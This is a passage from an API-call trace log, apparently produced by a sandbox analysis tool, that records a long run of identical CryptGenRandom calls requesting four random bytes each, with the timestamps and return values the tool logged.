dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.477] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: 